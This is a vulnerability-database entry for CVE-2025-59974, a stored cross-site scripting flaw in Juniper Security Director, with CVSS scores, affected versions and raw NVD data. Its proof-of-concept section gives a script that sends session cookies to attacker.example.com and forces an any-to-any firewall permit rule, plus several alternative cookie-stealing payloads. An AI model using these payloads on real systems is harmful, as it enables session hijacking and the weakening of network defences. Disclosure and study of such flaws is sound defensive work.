Security Vulnerability Report
CVE-2025-59974 CVSS 8.4 HIGH

Published: 2025-10-09 16:15:47
Last Modified: 2026-01-23 19:59:03

Description

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Junos Space Security Director allows an attacker to inject malicious scripts into the application, which are then stored and executed in the context of other users' browsers when they access affected pages. This issue affects Juniper Security Director: all versions before 24.1R4.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:juniper:space_security_director:*:*:*:*:*:*:*:* (versions before 24.1) - VULNERABLE
cpe:2.3:a:juniper:space_security_director:24.1:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:space_security_director:24.1:r2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:space_security_director:24.1:r3:*:*:*:*:*:* - VULNERABLE
Juniper Security Director < 24.1R4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  CVE-2025-59974 - Juniper Security Director Stored XSS PoC
  Vulnerability: Improper Neutralization of Input During Web Page Generation
  Attack Type: Stored XSS (requires high privilege PR:H + user interaction UI:R)
-->

<!-- Step 1: Attacker (authenticated high-privilege user) injects malicious payload into a vulnerable input field -->
<!-- Example: Injecting payload via a policy description or device label field -->
<script>
  // Exfiltrate admin session cookie to attacker-controlled server
  var img = new Image();
  img.src = "https://attacker.example.com/steal?cookie=" + encodeURIComponent(document.cookie);

  // Perform privileged actions on behalf of the victim (e.g., modify firewall policy)
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/api/junos/space/security-management/firewall-policy/modify", true);
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.withCredentials = true;
  xhr.send(JSON.stringify({
    "policyId": "target-policy-id",
    "action": "permit",
    "sourceAddress": "any",
    "destinationAddress": "any",
    "comment": "Compromised by CVE-2025-59974"
  }));
</script>

<!-- Step 2: Victim (e.g., admin) views the affected page containing the stored payload -->
<!-- The malicious script executes in the victim's browser context automatically -->

<!-- Alternative payloads for different injection contexts -->

<!-- HTML attribute context: -->
" onmouseover="alert(document.domain)" autofocus=""

<!-- SVG-based payload (bypasses some filters): -->
<svg/onload=fetch('https://attacker.example.com/log?data='+document.cookie)>

<!-- Event handler in img tag: -->
<img src=x onerror="var i=new Image();i.src='https://attacker.example.com/x?'+document.cookie;">

References

https://supportportal.juniper.net/JSA103139 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59974", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:46.993", "lastModified": "2026-01-23T19:59:02.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Junos Space Security Director allows an attacker to inject malicious scripts into the application, which are then stored and executed in the context of other users' browsers when they access affected pages.This issue affects Juniper Security Director: \n\n * All versions before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:Amber", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "089ADA2B-78A6-46F2-9560-B4EC849D394F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "DBDC52A5-EE95-40D7-870C-56AF400E0531"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "3C05DBD6-F4E6-4748-BBC9-CB0DF6ED3541"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:space_security_director:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "B866E017-3B4A-4779-A736-5D68E544E93F"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103139", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}